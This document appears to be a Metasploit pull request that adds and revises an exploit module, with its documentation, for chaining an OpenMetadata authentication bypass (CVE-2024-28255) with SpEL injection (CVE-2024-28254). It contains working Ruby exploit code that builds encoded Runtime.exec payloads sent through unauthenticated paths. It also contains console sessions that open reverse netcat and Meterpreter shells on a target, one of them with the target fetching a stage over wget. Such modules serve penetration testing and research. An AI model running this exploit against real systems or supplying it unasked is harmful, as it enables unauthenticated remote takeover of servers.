### PR TITLE
OpenMetadata authentication bypass and SpEL injection exploit chain[CVE-2024-28255 and CVE-2024-28254]

### DIFF
--- a/documentation/modules/exploit/linux/http/openmetadata_auth_bypass_rce.md
+++ b/documentation/modules/exploit/linux/http/openmetadata_auth_bypass_rce.md
@@ -45,15 +45,15 @@ msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > info
        Name: OpenMetadata authentication bypass and SpEL injection exploit chain
      Module: exploit/linux/http/openmetadata_auth_bypass_rce
    Platform: Unix, Linux
-       Arch: cmd, x64, x86
- Privileged: Yes
+       Arch: cmd
+ Privileged: No
     License: Metasploit Framework License (BSD)
        Rank: Excellent
   Disclosed: 2024-03-15
 
 Provided by:
   h00die-gr3y <h00die.gr3y@gmail.com>
-  Matias Puerta alias tutte (https://github.com/tutte)
+  Alvaro Muñoz alias pwntester (https://github.com/pwntester)
 
 Module side effects:
  ioc-in-logs
@@ -68,8 +68,7 @@ Module reliability:
 Available targets:
       Id  Name
       --  ----
-  =>  0   Unix Command
-      1   Linux Dropper
+  =>  0   Automatic
 
 Check supported:
   Yes
@@ -82,19 +81,8 @@ Basic options:
                                         html
   RPORT      8585             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
-  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The URI path of the OpenMetadata web application
-  URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host
-
-
-  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
-
-  Name     Current Setting  Required  Description
-  ----     ---------------  --------  -----------
-  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.
-                                      0.0.0 to listen on all addresses.
-  SRVPORT  8080             yes       The local port to listen on.
 
 Payload information:
 
@@ -103,7 +91,7 @@ Description:
   by a central metadata repository, in-depth lineage, and seamless team collaboration.
   This module chains two vulnerabilities that exist in the OpenMetadata aplication.
   The first vulnerability, CVE-2024-28255, bypasses the API authentication using JWT tokens.
-  It misuses the `JwtFilter` that checks the path of url endpoint against a list of excluded
+  It misuses the `JwtFilter` that checks the path of the url endpoint against a list of excluded
   endpoints that does not require authentication. Unfortunately, an attacker may use Path Parameters
   to make any path contain any arbitrary strings that will match the excluded endpoint condition
   and therefore will be processed with no JWT validation allowing an attacker to bypass the
@@ -117,16 +105,15 @@ Description:
 References:
   https://nvd.nist.gov/vuln/detail/CVE-2024-28255
   https://nvd.nist.gov/vuln/detail/CVE-2024-28254
-  https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-6wx7-qw5p-wh84
+A  https://securitylab.github.com/advisories/GHSL-2023-235_GHSL-2023-237_Open_Metadata/
   https://attackerkb.com/topics/f19fXpZn62/cve-2024-28255
   https://ethicalhacking.uk/unmasking-cve-2024-28255-authentication-bypass-in-openmetadata/
 
+
 View the full module info with the info -d command.
 ```
-### OpenMetadata 1.2.3 Unix command - cmd/unix/reverse_netcat_gaping
+### OpenMetadata 1.2.3 Automatic - cmd/unix/reverse_netcat_gaping
 ```msf
-msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set target 0
-target => 0
 msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set payload cmd/unix/reverse_netcat_gaping
 payload => cmd/unix/reverse_netcat_gaping
 msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set rhosts 192.168.201.42
@@ -149,29 +136,19 @@ pwd
 uname -a
 Linux 1e3c578a0acc 6.6.32-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Jun 13 14:14:43 UTC 2024 x86_64 Linux
 ```
-### OpenMetadata 1.2.3 Linux Dropper -  linux/x64/meterpreter/reverse_tcp
+### OpenMetadata 1.2.3 Automatic - cmd/linux/http/x64/meterpreter/reverse_tcp
 ```msf
-msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set target 1
-target => 1
-msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set payload linux/x64/meterpreter/reverse_tcp
-payload => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
 msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.201.8:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Trying to detect if target is running a vulnerable version of OpenMetadata.
 [+] The target is vulnerable. Version 1.2.3
-[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
-[*] Using URL: http://192.168.201.8:8080/WnMaYO
-[*] Client 192.168.201.42 (Wget) requested /WnMaYO
-[*] Sending payload to 192.168.201.42 (Wget)
-[*] Command Stager progress -  50.46% done (55/109 bytes)
-[*] Command Stager progress -  70.64% done (77/109 bytes)
+[*] Executing Automatic for cmd/linux/http/x64/meterpreter/reverse_tcp
 [*] Sending stage (3045380 bytes) to 192.168.201.42
-[*] Command Stager progress -  82.57% done (90/109 bytes)
-[*] Command Stager progress - 100.00% done (109/109 bytes)
-[*] Meterpreter session 18 opened (192.168.201.8:4444 -> 192.168.201.42:55205) at 2024-07-29 15:30:41 +0000
-[*] Server stopped.
+[*] Meterpreter session 11 opened (192.168.201.8:4444 -> 192.168.201.42:50599) at 2024-07-31 14:31:37 +0000
 
 meterpreter > getuid
 Server username: openmetadata
@@ -186,4 +163,4 @@ meterpreter > pwd
 meterpreter >
 ```
 ## Limitations
-Only limited payloads will work, so stick to the default payloads configured at the module.
+No limitations

--- a/documentation/modules/exploit/linux/http/openmetadata_auth_bypass_rce.md
+++ b/documentation/modules/exploit/linux/http/openmetadata_auth_bypass_rce.md
@@ -1,0 +1,189 @@
+## Vulnerable Application
+
+OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository,
+in-depth lineage, and seamless team collaboration.
+This module chains two vulnerabilities that exist in the OpenMetadata application.
+The first vulnerability, [CVE-2024-28255](https://nvd.nist.gov/vuln/detail/CVE-2024-28255), bypasses the API authentication
+using JWT tokens. It misuses the `JwtFilter` that checks the path of url endpoint against a list of excluded endpoints
+that does not require authentication.
+Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings that will match the
+excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the
+authentication mechanism and reach any arbitrary endpoint.
+By chaining this vulnerability with [CVE-2024-28254](https://nvd.nist.gov/vuln/detail/CVE-2024-28254), that allows for
+arbitrary SpEL injection at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`,attackers are able
+to run arbitrary commands using Java classes such as `java.lang.Runtime` without any authentication.
+
+OpenMetadata versions `1.2.3` and below are vulnerable.
+
+The following releases were tested.
+* OpenMetadata 1.2.3 on Docker
+
+## Installation steps to install the OpenMedata running on Docker
+* Please follow these [installation instructions](https://docs.open-metadata.org/v1.3.x/quick-start/local-docker-deployment).
+* Please ensure that you download version 1.2.3 or below.
+* After successful installation your should be able to access OpenMetadata on port 8585 at `http://your_openmetadata_ip:8585`.
+
+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/openmetadata_auth_bypass_rce`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ]  `set lhost <attacker-ip>`
+- [ ] `set target <0=Unix Command, 1=Linux Dropper>`
+- [ ] `exploit`
+- [ ] you should get a `reverse netcat shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+No specific options
+
+## Scenarios
+```msf
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > info
+
+       Name: OpenMetadata authentication bypass and SpEL injection exploit chain
+     Module: exploit/linux/http/openmetadata_auth_bypass_rce
+   Platform: Unix, Linux
+       Arch: cmd, x64, x86
+ Privileged: Yes
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2024-03-15
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Matias Puerta alias tutte (https://github.com/tutte)
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   Unix Command
+      1   Linux Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
+                                        html
+  RPORT      8585             yes       The target port (TCP)
+  SSL        false            no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+  TARGETURI  /                yes       The URI path of the OpenMetadata web application
+  URIPATH                     no        The URI to use for this exploit (default is random)
+  VHOST                       no        HTTP server virtual host
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.
+                                      0.0.0 to listen on all addresses.
+  SRVPORT  8080             yes       The local port to listen on.
+
+Payload information:
+
+Description:
+  OpenMetadata is a unified platform for discovery, observability, and governance powered
+  by a central metadata repository, in-depth lineage, and seamless team collaboration.
+  This module chains two vulnerabilities that exist in the OpenMetadata aplication.
+  The first vulnerability, CVE-2024-28255, bypasses the API authentication using JWT tokens.
+  It misuses the `JwtFilter` that checks the path of url endpoint against a list of excluded
+  endpoints that does not require authentication. Unfortunately, an attacker may use Path Parameters
+  to make any path contain any arbitrary strings that will match the excluded endpoint condition
+  and therefore will be processed with no JWT validation allowing an attacker to bypass the
+  authentication mechanism and reach any arbitrary endpoint.
+  By chaining this vulnerability with CVE-2024-28254, that allows for arbitrary SpEL injection
+  at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`, attackers
+  are able to run arbitrary commands using Java classes such as `java.lang.Runtime` without any
+  authentication.
+  OpenMetadata versions `1.2.3` and below are vulnerable.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2024-28255
+  https://nvd.nist.gov/vuln/detail/CVE-2024-28254
+  https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-6wx7-qw5p-wh84
+  https://attackerkb.com/topics/f19fXpZn62/cve-2024-28255
+  https://ethicalhacking.uk/unmasking-cve-2024-28255-authentication-bypass-in-openmetadata/
+
+View the full module info with the info -d command.
+```
+### OpenMetadata 1.2.3 Unix command - cmd/unix/reverse_netcat_gaping
+```msf
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set target 0
+target => 0
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set payload cmd/unix/reverse_netcat_gaping
+payload => cmd/unix/reverse_netcat_gaping
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set rhosts 192.168.201.42
+rhosts => 192.168.201.42
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of OpenMetadata.
+[+] The target is vulnerable. Version 1.2.3
+[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping
+[*] Command shell session 17 opened (192.168.201.8:4444 -> 192.168.201.42:55160) at 2024-07-29 15:27:38 +0000
+
+id
+uid=1000(openmetadata) gid=1000(openmetadata) groups=1000(openmetadata)
+pwd
+/opt/openmetadata
+uname -a
+Linux 1e3c578a0acc 6.6.32-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Jun 13 14:14:43 UTC 2024 x86_64 Linux
+```
+### OpenMetadata 1.2.3 Linux Dropper -  linux/x64/meterpreter/reverse_tcp
+```msf
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set target 1
+target => 1
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of OpenMetadata.
+[+] The target is vulnerable. Version 1.2.3
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.8:8080/WnMaYO
+[*] Client 192.168.201.42 (Wget) requested /WnMaYO
+[*] Sending payload to 192.168.201.42 (Wget)
+[*] Command Stager progress -  50.46% done (55/109 bytes)
+[*] Command Stager progress -  70.64% done (77/109 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.201.42
+[*] Command Stager progress -  82.57% done (90/109 bytes)
+[*] Command Stager progress - 100.00% done (109/109 bytes)
+[*] Meterpreter session 18 opened (192.168.201.8:4444 -> 192.168.201.42:55205) at 2024-07-29 15:30:41 +0000
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: openmetadata
+meterpreter > sysinfo
+Computer     : 172.16.240.4
+OS           :  (Linux 6.6.32-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > pwd
+/opt/openmetadata
+meterpreter >
+```
+## Limitations
+Only limited payloads will work, so stick to the default payloads configured at the module.

--- a/documentation/modules/exploit/linux/http/openmetadata_auth_bypass_rce.md
+++ b/documentation/modules/exploit/linux/http/openmetadata_auth_bypass_rce.md
@@ -163,4 +163,4 @@ meterpreter > pwd
 meterpreter >
 ```
 ## Limitations
-No limitations
+No limitations.

--- a/modules/exploits/linux/http/openmetadata_auth_bypass_rce.rb
+++ b/modules/exploits/linux/http/openmetadata_auth_bypass_rce.rb
@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(
@@ -17,15 +16,15 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           OpenMetadata is a unified platform for discovery, observability, and governance powered
           by a central metadata repository, in-depth lineage, and seamless team collaboration.
-          This module chains two vulnerabilities that exist in the OpenMetadat aaplication.
+          This module chains two vulnerabilities that exist in the OpenMetadata aplication.
           The first vulnerability, CVE-2024-28255, bypasses the API authentication using JWT tokens.
-          It misuses the `JwtFilter` that checks the path of url endpoint against a list of excluded
+          It misuses the `JwtFilter` that checks the path of the url endpoint against a list of excluded
           endpoints that does not require authentication. Unfortunately, an attacker may use Path Parameters
           to make any path contain any arbitrary strings that will match the excluded endpoint condition
           and therefore will be processed with no JWT validation allowing an attacker to bypass the
           authentication mechanism and reach any arbitrary endpoint.
-          By chaining this vulnerability with CVE-2024-28254, that allows for arbitrary SpEL expression
-          injection at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`, attackers
+          By chaining this vulnerability with CVE-2024-28254, that allows for arbitrary SpEL injection
+          at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`, attackers
           are able to run arbitrary commands using Java classes such as `java.lang.Runtime` without any
           authentication.
           OpenMetadata versions `1.2.3` and below are vulnerable.
@@ -33,43 +32,32 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => [
           'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Msf module contributor
-          'Matias Puerta alias tutte (https://github.com/tutte)' # Original discovery
+          'Alvaro Muñoz alias pwntester (https://github.com/pwntester)' # Original discovery
         ],
         'References' => [
           ['CVE', '2024-28255'],
           ['CVE', '2024-28254'],
-          ['URL', 'https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-6wx7-qw5p-wh84'],
+          ['URL', 'https://securitylab.github.com/advisories/GHSL-2023-235_GHSL-2023-237_Open_Metadata/'],
           ['URL', 'https://attackerkb.com/topics/f19fXpZn62/cve-2024-28255'],
           ['URL', 'https://ethicalhacking.uk/unmasking-cve-2024-28255-authentication-bypass-in-openmetadata/']
         ],
         'DisclosureDate' => '2024-03-15',
         'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
-        'Privileged' => true,
+        'Arch' => [ARCH_CMD],
+        'Privileged' => false,
         'Targets' => [
           [
-            'Unix Command',
+            'Automatic',
             {
-              'Platform' => ['unix'],
-              'Arch' => ARCH_CMD,
-              'Type' => :unix_cmd,
-              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' }
-            }
-          ],
-          [
-            'Linux Dropper',
-            {
-              'Platform' => ['linux'],
-              'Arch' => [ARCH_X64, ARCH_X86],
-              'Type' => :linux_dropper,
-              'CmdStagerFlavor' => ['wget', 'curl'],
-              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD
             }
           ]
         ],
         'DefaultTarget' => 0,
         'DefaultOptions' => {
-          'rport' => 8585
+          'rport' => 8585,
+          'FETCH_COMMAND' => 'WGET'
         },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -99,6 +87,8 @@ class MetasploitModule < Msf::Exploit::Remote
       '/api/v1;v1%2Fv1%2Fsystem%2Fconfig',
       '/api/v1;v1%2Fv1%2Fsystem%2Fversion'
     ]
+    # $@|sh – Getting a shell environment from Runtime.exec
+    cmd = "sh -c $@|sh . echo #{cmd}"
     cmd_b64 = Base64.strict_encode64(cmd)
     spel_payload = "T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(\"#{cmd_b64}\")))"
     paths_to_skip.shuffle!.each do |path|
@@ -139,11 +129,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
-    case target['Type']
-    when :unix_cmd
-      execute_command(payload.encoded)
-    when :linux_dropper
-      execute_cmdstager(noconcat: true)
-    end
+    execute_command(payload.encoded)
   end
 end

--- a/modules/exploits/linux/http/openmetadata_auth_bypass_rce.rb
+++ b/modules/exploits/linux/http/openmetadata_auth_bypass_rce.rb
@@ -1,0 +1,149 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'OpenMetadata authentication bypass and SpEL injection exploit chain',
+        'Description' => %q{
+          OpenMetadata is a unified platform for discovery, observability, and governance powered
+          by a central metadata repository, in-depth lineage, and seamless team collaboration.
+          This module chains two vulnerabilities that exist in the OpenMetadat aaplication.
+          The first vulnerability, CVE-2024-28255, bypasses the API authentication using JWT tokens.
+          It misuses the `JwtFilter` that checks the path of url endpoint against a list of excluded
+          endpoints that does not require authentication. Unfortunately, an attacker may use Path Parameters
+          to make any path contain any arbitrary strings that will match the excluded endpoint condition
+          and therefore will be processed with no JWT validation allowing an attacker to bypass the
+          authentication mechanism and reach any arbitrary endpoint.
+          By chaining this vulnerability with CVE-2024-28254, that allows for arbitrary SpEL expression
+          injection at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`, attackers
+          are able to run arbitrary commands using Java classes such as `java.lang.Runtime` without any
+          authentication.
+          OpenMetadata versions `1.2.3` and below are vulnerable.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Msf module contributor
+          'Matias Puerta alias tutte (https://github.com/tutte)' # Original discovery
+        ],
+        'References' => [
+          ['CVE', '2024-28255'],
+          ['CVE', '2024-28254'],
+          ['URL', 'https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-6wx7-qw5p-wh84'],
+          ['URL', 'https://attackerkb.com/topics/f19fXpZn62/cve-2024-28255'],
+          ['URL', 'https://ethicalhacking.uk/unmasking-cve-2024-28255-authentication-bypass-in-openmetadata/']
+        ],
+        'DisclosureDate' => '2024-03-15',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => ['unix'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => ['linux'],
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['wget', 'curl'],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'rport' => 8585
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI path of the OpenMetadata web application', '/'])
+      ]
+    )
+  end
+
+  def execute_command(cmd, _opts = {})
+    # list of paths that require no authentication
+    paths_to_skip = [
+      '/api/v1;v1%2Fv1%2Fusers%2Flogin',
+      '/api/v1;v1%2Fv1%2Fusers%2Fsignup',
+      '/api/v1;v1%2Fv1%2Fusers%2FregistrationConfirmation',
+      '/api/v1;v1%2Fv1%2Fusers%2FresendRegistrationToken',
+      '/api/v1;v1%2Fv1%2Fusers%2FgeneratePasswordResetLink',
+      '/api/v1;v1%2Fv1%2Fusers%2Fpassword%2Freset',
+      '/api/v1;v1%2Fv1%2Fusers%2FcheckEmailInUse',
+      '/api/v1;v1%2Fv1%2Fusers%2Frefresh',
+      '/api/v1;v1%2Fv1%2Fsystem%2Fconfig',
+      '/api/v1;v1%2Fv1%2Fsystem%2Fversion'
+    ]
+    cmd_b64 = Base64.strict_encode64(cmd)
+    spel_payload = "T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(\"#{cmd_b64}\")))"
+    paths_to_skip.shuffle!.each do |path|
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, path, 'events', 'subscriptions', 'validation', 'condition', spel_payload),
+        'method' => 'GET'
+      })
+      break if res.code == 400 && res.body.include?('EL1001E')
+    end
+  end
+
+  def check
+    print_status('Trying to detect if target is running a vulnerable version of OpenMetadata.')
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET'
+    })
+    return CheckCode::Unknown('Could not detect OpenMetadata.') unless res && res.code == 200 && res.body.include?('OpenMetadata')
+
+    # try to dectect version
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'system', 'version'),
+      'method' => 'GET'
+    })
+    return CheckCode::Detected('Could not retrieve the version information.') unless res && res.code == 200
+
+    # parse json response and get the version
+    res_json = res.get_json_document
+    unless res_json.blank?
+      version = res_json['version']
+      version_number = Rex::Version.new(version.gsub(/[[:space:]]/, '')) unless version.nil?
+    end
+    return CheckCode::Detected('Could not retrieve the version information.') if version_number.nil?
+    return CheckCode::Vulnerable("Version #{version_number}") if version_number <= Rex::Version.new('1.2.3')
+
+    CheckCode::Safe("Version #{version_number}")
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager(noconcat: true)
+    end
+  end
+end

--- a/modules/exploits/linux/http/openmetadata_auth_bypass_rce.rb
+++ b/modules/exploits/linux/http/openmetadata_auth_bypass_rce.rb
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, _opts = {})
     # list of paths that require no authentication
-    paths_to_skip = [
+    unauthed_paths = [
       '/api/v1;v1%2Fv1%2Fusers%2Flogin',
       '/api/v1;v1%2Fv1%2Fusers%2Fsignup',
       '/api/v1;v1%2Fv1%2Fusers%2FregistrationConfirmation',
@@ -91,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
     cmd = "sh -c $@|sh . echo #{cmd}"
     cmd_b64 = Base64.strict_encode64(cmd)
     spel_payload = "T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(\"#{cmd_b64}\")))"
-    paths_to_skip.shuffle!.each do |path|
+    unauthed_paths.shuffle!.each do |path|
       res = send_request_cgi({
         'uri' => normalize_uri(target_uri.path, path, 'events', 'subscriptions', 'validation', 'condition', spel_payload),
         'method' => 'GET'

--- a/modules/exploits/linux/http/openmetadata_auth_bypass_rce.rb
+++ b/modules/exploits/linux/http/openmetadata_auth_bypass_rce.rb
@@ -122,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
       version_number = Rex::Version.new(version.gsub(/[[:space:]]/, '')) unless version.nil?
     end
     return CheckCode::Detected('Could not retrieve the version information.') if version_number.nil?
-    return CheckCode::Vulnerable("Version #{version_number}") if version_number <= Rex::Version.new('1.2.3')
+    return CheckCode::Appears("Version #{version_number}") if version_number <= Rex::Version.new('1.2.3')
 
     CheckCode::Safe("Version #{version_number}")
   end


### PR DESCRIPTION
 OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration.
This module chains two vulnerabilities that exist in the OpenMetadata application.
The first vulnerability, [CVE-2024-28255](https://nvd.nist.gov/vuln/detail/CVE-2024-28255), bypasses the API authentication using JWT tokens. It misuses the `JwtFilter` that checks the path of url endpoint against a list of excluded endpoints that does not require authentication. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings that will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint.
By chaining this vulnerability with [CVE-2024-28254](https://nvd.nist.gov/vuln/detail/CVE-2024-28254), that allows for arbitrary SpEL injection at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`, attackers are able to run arbitrary commands using Java classes such as `java.lang.Runtime` without any authentication.

OpenMetadata versions `1.2.3` and below are vulnerable.

The following releases were tested.
* OpenMetadata 1.2.3 on Docker

## Installation steps to install the OpenMedata running on Docker
* Please follow these [installation instructions](https://docs.open-metadata.org/v1.3.x/quick-start/local-docker-deployment).
* Please ensure that you download version 1.2.3 or below.
* After successful installation your should be able to access OpenMetadata on port 8585 at `http://your_openmetadata_ip:8585`.

You are now ready to test the module.

## Verification Steps
- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/openmetadata_auth_bypass_rce`
- [ ] `set rhosts <ip-target>`
- [ ] `set rport <port>`
- [ ]  `set lhost <attacker-ip>`
- [ ] `set target <0=Unix Command, 1=Linux Dropper>`
- [ ] `exploit`
- [ ] you should get a `reverse netcat shell` or `Meterpreter` session depending on the `payload` and `target` settings

```msf
msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > info

       Name: OpenMetadata authentication bypass and SpEL injection exploit chain
     Module: exploit/linux/http/openmetadata_auth_bypass_rce
   Platform: Unix, Linux
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2024-03-15

Provided by:
  h00die-gr3y <h00die.gr3y@gmail.com>
  Alvaro Muñoz alias pwntester (https://github.com/pwntester)

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   Automatic

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     192.168.201.42   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
                                        html
  RPORT      8585             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The URI path of the OpenMetadata web application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  OpenMetadata is a unified platform for discovery, observability, and governance powered
  by a central metadata repository, in-depth lineage, and seamless team collaboration.
  This module chains two vulnerabilities that exist in the OpenMetadata aplication.
  The first vulnerability, CVE-2024-28255, bypasses the API authentication using JWT tokens.
  It misuses the `JwtFilter` that checks the path of the url endpoint against a list of excluded
  endpoints that does not require authentication. Unfortunately, an attacker may use Path Parameters
  to make any path contain any arbitrary strings that will match the excluded endpoint condition
  and therefore will be processed with no JWT validation allowing an attacker to bypass the
  authentication mechanism and reach any arbitrary endpoint.
  By chaining this vulnerability with CVE-2024-28254, that allows for arbitrary SpEL injection
  at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`, attackers
  are able to run arbitrary commands using Java classes such as `java.lang.Runtime` without any
  authentication.
  OpenMetadata versions `1.2.3` and below are vulnerable.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2024-28255
  https://nvd.nist.gov/vuln/detail/CVE-2024-28254
  https://securitylab.github.com/advisories/GHSL-2023-235_GHSL-2023-237_Open_Metadata/
  https://attackerkb.com/topics/f19fXpZn62/cve-2024-28255
  https://ethicalhacking.uk/unmasking-cve-2024-28255-authentication-bypass-in-openmetadata/


View the full module info with the info -d command.

